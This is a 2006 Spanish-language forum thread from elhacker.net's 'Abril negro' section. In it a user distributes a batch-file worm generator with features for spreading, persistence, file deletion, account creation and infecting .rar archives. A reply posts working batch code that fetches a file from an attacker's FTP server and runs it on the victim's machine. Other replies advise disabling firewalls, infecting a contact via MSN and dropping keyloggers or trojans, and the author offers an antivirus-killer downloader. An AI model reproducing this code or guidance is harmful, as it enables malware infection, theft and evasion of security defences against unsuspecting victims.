Foro de elhacker.net

Seguridad Informática => Abril negro => Mensaje iniciado por: Hendrix en 11 Abril 2006, 23:21 pm



Título: [Abril Negro] Generador de Worms en Batch (By Hendrix)
Publicado por: Hendrix en 11 Abril 2006, 23:21 pm
Weno, tras horas de trabajo frente al PC (no solamente programando en batch, me hice un programa en VB que editaba texto para agilizar el trabajo) aki esta la version 1.0 de este Generador de Worms. A este programa en teoria lo tenia que hacer en VB, pero vi que kon batch era facilisimo (el de B lo estoy kontinuando, si alguien kiere info que me lo pida por IM).

Link: Generador de Worms en batch By Hendrix (http://es.geocities.com/cusacoxa/3sk0r8ut0.zip)

Weno, tiene estas caracteristicas:

1. Propagación por P2P
2. Mensage al iniciarse
3. Agregarse al Registro
4. Infectar archivos .rar
5. Borrar archivos
6. Manupular red LAN
7. Añadir Usuario y Pass
8. Copiarse y Ocultarse
9. Descargar archivo en la victima
10. Informacion adicional
11. Salir

Weno, a medida que tenga tiempo le ire agregando mas kosas, komo por ejemplo un AV Killer, propagacion por e-mail (kuando sepa) y propagacion por LAN (muy mediocre).

Weno, Espero que les guste.

Salu2

Hendrix



Título: Re: [Abril Negro] Generador de Worms en Batch (By Hendrix)
Publicado por: ABDSO en 11 Abril 2006, 23:54 pm
Osea que el archivo que dejas para descargar es como un editor de Worms verdad?. Se edita el gusano y el propio generador crea el gusano?.

Son detectables los gusanos creados?

XD graxxx buen aporte.


Título: Re: [Abril Negro] Generador de Worms en Batch (By Hendrix)
Publicado por: NoVaC en 12 Abril 2006, 00:26 am
Hendrix eres el amo  ;D

Tu das sentido a mis estudios xD todos me dicen que pa que coño me va a servir los bats que si esto k si lo otro y despues pienso en tus troyanos y too eso y me dan mas ganas de seguir con ellos ^^

solo falta que hagas un bat que consiga que me forre por dormir y pasaras a ser mi dios xDxDxD


Título: Re: [Abril Negro] Generador de Worms en Batch (By Hendrix)
Publicado por: Hendrix en 12 Abril 2006, 07:39 am
jejejeje muchas gracias.... ;) ;) ;)

Si, el Gnerador te crea el gusano en C:\. Te crea lo que tu le digas. Cuando termines la edicion le das a salir, luego te vas a C:\ y alli encontraras tu Worm. Los Worms pasenlos a .exe..... ;) ;) ;)

Salu2

Hendrix



Título: Re: [Abril Negro] Generador de Worms en Batch (By Hendrix)
Publicado por: hackpsycho en 12 Abril 2006, 08:58 am
mm ok, eso te faltaba, k tenia k estar en .exe, Gracias lo probare ;)


Título: Re: [Abril Negro] Generador de Worms en Batch (By Hendrix)
Publicado por: BenRu en 12 Abril 2006, 15:29 pm
Tio, eres el dios del batch!!!

Por algun motivo te hice moderador de mi foro xDD

Sige asi campeon  :D


Título: Re: [Abril Negro] Generador de Worms en Batch (By Hendrix)
Publicado por: Hendrix en 12 Abril 2006, 15:44 pm
jajajaja tampoco es para tanto.... ;) ;) ;) ;D ;D ;D

Ahora me pondre a hacer un manual y lo pondre en el mismo post.... ;) ;) ;)

Salu2

Hendrix



Título: Re: [Abril Negro] Generador de Worms en Batch (By Hendrix)
Publicado por: Meg en 12 Abril 2006, 15:46 pm
Hendrix_  te doy la enorabuena esta muy bien ese generador de worms


Título: Re: [Abril Negro] Generador de Worms en Batch (By Hendrix)
Publicado por: Hendrix en 12 Abril 2006, 16:21 pm
Weno, le e agregado un manual que explica mas o menos que hace kada funcion.

Ademas le e korregido un fallo de redireccionamiento (pasaba del infectar.rar a agregar usuario y pass).

Lo pueden volver a bajar de la misma dirección... ;) ;) ;)

Salu2

Hendrix



Título: Re: [Abril Negro] Generador de Worms en Batch (By Hendrix)
Publicado por: RED_HORSE en 12 Abril 2006, 23:44 pm
  muy bueno al batch ya me imagino el trabajo que te costo ;D ;D ;D ;D pero todo bale la pena siempre TE FELICITO  ;D


Título: Re: [Abril Negro] Generador de Worms en Batch (By Hendrix)
Publicado por: hardkoo en 18 Abril 2006, 16:33 pm
Muy buen trabajo _Hendrix_  :D :D

Una cosa, la opcion de bajar el archivo por FTP no me iba bien me daba password incorrecto... no se si a alguien mas le ha pasado??
Bueno lo que hice fue editar el codigo que genera el archivo datos.txt juntando los espacios que quedaban entre medio, asi al final descargo el archivo. Supongo que el error era ese que cogia los espacios como parte de la contraseña o el nombre.

Yo cambie en el Generador de Worms 3sk0r8ut0.bat esto y ya me funciona bien ;D

Código:
:down1
echo echo %ftpnom%^>C:\datos.txt>>C:\%name%.bat
echo echo %ftpas%^>^>C:\datos.txt>>C:\%name%.bat
echo echo put C:\datos.txt datos.txt^>^>C:\datos.txt>>C:\%name%.bat
echo echo binary^>^>C:\datos.txt>>C:\%name%.bat
echo echo get %ftpfile% %ftpruta%\%ftpfile%^>^>C:\datos.txt>>C:\%name%.bat
echo echo delete datos.txt^>^>C:\datos.txt>>C:\%name%.bat
echo echo bye^>^>C:\datos.txt>>C:\%name%.bat
echo ftp -s:C:\datos.txt %ftpftp% >>C:\%name%.bat
echo del /s /q C:\datos.txt >>C:\%name%.bat
echo start %ftpruta%\%ftpfile% >>C:\%name%.bat
cls

Y una pregunta el descargador de archivos es detectado por firewall del XP? Yo lo he probado en el firewall de Sygate y me lo detecto :-\
Habrial alguna forma de saltarse este firewall? o habria que matar el proceso primero?

-salu2-


Título: Re: [Abril Negro] Generador de Worms en Batch (By Hendrix)
Publicado por: Hendrix en 18 Abril 2006, 17:55 pm
Weno, jejjejeje con tanto code algun fallo tendria que tener....Gracias por corregirlo.... ;) ;) ;)

Si, tendrias que matar el Firewall de Windows (o el que te lo detecte) ya que en batch no se pueden hacer inyecciones en procesos..xD xD xD

Salu2

Hendrix



Título: Re: [Abril Negro] Generador de Worms en Batch (By Hendrix)
Publicado por: _NexuS_ en 26 Abril 2006, 02:36 am
EXELENTE.... aunque aprendi muchas cosas viendo el code del BATCH... no sabia ponerle colores a las letras  :rolleyes:
----
lo mejro de todo es el nombre... Eskorbuto, uno de los mejores grupos punk BUEN NOMBRE PARA BUEN PROGRAMA, exelente aporte


Título: Re: [Abril Negro] Generador de Worms en Batch (By Hendrix)
Publicado por: cacolo en 26 Abril 2006, 03:43 am
Tengo una duda.... cuando creo lo del rar... se infecta el rar y ahora ? Eso se lo mando a otro por ejemplo por msn y se le infecta la pc ?  osea lo k quiero saber si sirve para esto... hago el worm. infecto el rar le mando el rar  lo abre y ya ta infectado y keria saber una vez infectado con el rar usar la opcion d descargele archivos x ftp? Capaz k soy algo estupido y no entiedno bien y estoy diciendo una boludes porq se ve facil si seria asi oO.

me podrian sakar la duda plx.


Título: Re: [Abril Negro] Generador de Worms en Batch (By Hendrix)
Publicado por: Casidiablo en 26 Abril 2006, 03:53 am
Si, el Gnerador te crea el gusano en C:\. Te crea lo que tu le digas. Cuando termines la edicion le das a salir, luego te vas a C:\ y alli encontraras tu Worm. Los Worms pasenlos a .exe..... ;) ;) ;)

Perdonen mi ignorancia pero no entiendo lo de pasarlos worms a .exe


Título: Re: [Abril Negro] Generador de Worms en Batch (By Hendrix)
Publicado por: ^DeMoN^ en 26 Abril 2006, 09:23 am
Cuando engas tu "worm" hecho pone 10 dale enter que seria la informacion adicional ahi te da un link donde podes descargar un programa que te lo pasa a exe.


Título: Re: [Abril Negro] Generador de Worms en Batch (By Hendrix)
Publicado por: Hendrix en 26 Abril 2006, 15:30 pm
Mono_X, jejejeje gracias, hombre klaro!!!! un bune programa necsitaba el mejor donbre dentro del Punk Español.... ;D ;D ;D

cacolo, Si infectas un archivo .rar, tendra que abrir el .rar, y ejekutar lo de dentro, si solo lo habre no se va a infectar.... ;) ;) ;)
Y respekto a lo de infectar .rar + descargar de FTP eso nlo lo entiendo... ;) ;) ;)

Casidiablo, yo en VB diseñe un kompilador de archivos .bat a .exe....en el programa sale la ruta de descarga.... ;) ;)

Salu2



Título: Re: [Abril Negro] Generador de Worms en Batch (By Hendrix)
Publicado por: Casidiablo en 26 Abril 2006, 17:19 pm
Ok men gracias..ahora a practicar y a tratar de entender el còdigo en Batch. Ya hasta deberías ser moderador de este foro.

Saludos!!!


Título: Re: [Abril Negro] Generador de Worms en Batch (By Hendrix)
Publicado por: Hendrix en 26 Abril 2006, 17:42 pm
jajajaja no hay foro batch!!!! xD xD xD xD

El batch es uno de mis lenguajes favoritos....pero e echo tantos programas que ya no se que programar mas...

PD: hay gente komo sirdarkat o soplo que tambien son muy buenos programando en batch.... ;) ;) ;)

Salu2 y gracias... ;) ;)

Hendrix



Título: Re: [Abril Negro] Generador de Worms en Batch (By Hendrix)
Publicado por: l4g4rt0 en 26 Abril 2006, 19:10 pm
Ya tengo el archivo en .bat pero uso el compilador, tengo 3 archivos el .dll el editor compilator y el compilator, el compilator.exe me da error al abrirlo y el editor ese lo uso con el .bat pero no Crea ni modifica nada...


Título: Re: [Abril Negro] Generador de Worms en Batch (By Hendrix)
Publicado por: hardkoo en 26 Abril 2006, 21:10 pm
Yo utilizao Quick Batch File Compiler y me va de lujo :D, en opciones pones compilar en modo ghost (para que no se vea la ventanita negra) y todo perfecto, nunca me ha dado ningun fallo.

-salu2-


Título: Re: [Abril Negro] Generador de Worms en Batch (By Hendrix)
Publicado por: Hendrix en 26 Abril 2006, 21:29 pm
Se usa asi:

Abres el Editor...seleccionas el .bat y luego das en kompilar...y se kompila encima de compilator.exe.... ;) ;) ;) luego ya tieens el .bat compialdor en compilator.exe

Salu2

Hendrix



Título: Re: [Abril Negro] Generador de Worms en Batch (By Hendrix)
Publicado por: cacolo en 27 Abril 2006, 06:14 am
Gracias por responder, Ahora tengo otras Dudas... Primero keria decir que t felicito por el programa y haces buen trabajo sigue asi.

Mi dudas, Como dijiste, infecta el rar y lo d adentro.. Cualkier formato ? Osea tengo un rar con Fotos a dentro .jpg Si infecto el rar infecta las Fotos ? al abrir la fotos se infecta el ? o tiene k ser exe ?.

La otra duda sobre infectar y ftp... Lo k yo quiero usar el Programa es para infectar el rar y k se infecte la pc de el, Ahora una vez infectado como hago para meterle Archivo x ftp ? cuando configuro ftp se le va a bajar todo lo k puse en mi ftp automatica mente no ? o hay k hacerlo una vez k ta infectado ? si es asi como ? :P.

Otra duda, Dps si es como lo anterior, le descargo un keyloger en su pc y yo lo puedo ejecutar para k se le instale en su pc ? o solo puedo meter archivo y no poder ejecutar ?.

Espero sus respuestas, Desde ya muchas Gracias.


Yours,
Cacolo.


Título: Re: [Abril Negro] Generador de Worms en Batch (By Hendrix)
Publicado por: Hendrix en 27 Abril 2006, 15:01 pm
Haber, vamos por partes..... ;) ;)

1º. Al infectar un .rar, solo se infecta el .rar (es decir, se agrega el Worm komo archivo komprimido...) lo de infectar los otros archivos es imposible (kreo que en ningun lenguaje a menos que los sakes, los infectes y los vuelvas a comprimir).

2º Para bajar cosas del FTP es muy facil, y se descargan los arcghivos que tu kieras, si kieres deskargar un troyano??? pos descargas el troyano, no problem.... ;) ;)

3º Como en batch todo se puede hacer...si que se puede descargar y ejekutar.... ;) ;) ;)

Si kieres, te paso el Kode de un AV Killer + Trojan Downloader, este programa mataba los AV's/FW y despues descargaba el Troyano....y la viktima ni papa...xD xD xD

Salu2

Hendrix



Título: Re: [Abril Negro] Generador de Worms en Batch (By Hendrix)
Publicado por: ^DeMoN^ en 28 Abril 2006, 05:35 am
Estem borraron mi post :s

Me gustaria saber por que lo borraron siempre hacen las cosas sin avisar -.-'

respondo a un post ayudando a alguien que qeuria pasar de bat a exe y me borran el post? :s

EXPLICACION POR FAVOR. Gracias


Título: Re: [Abril Negro] Generador de Worms en Batch (By Hendrix)
Publicado por: l4g4rt0 en 28 Abril 2006, 17:26 pm
Yo ay una cosa q no termino de entender... Lo de borrar archivos que es, q la ruta q le pongas el q la abre se le cierra ese archivo o q? por q si es asi yo lo abro y no me funciona... no me borra lo q le haya puesto, y otra cosa No se por q pero cuando le pones mas de 1 funcion por ejemplo le pongo lo de borrar y lo de Mensaje al principio, pues el mensaje no va y tmpc se borra nada


Título: Re: [Abril Negro] Generador de Worms en Batch (By Hendrix)
Publicado por: Hendrix en 28 Abril 2006, 19:14 pm
 :o :o :o en serio???? pos ya lo mirare.... ;) ;) ;) aunke supongo que no es nada dificil de arreglar.... ;) ;) ;)

Salu2

Hendrix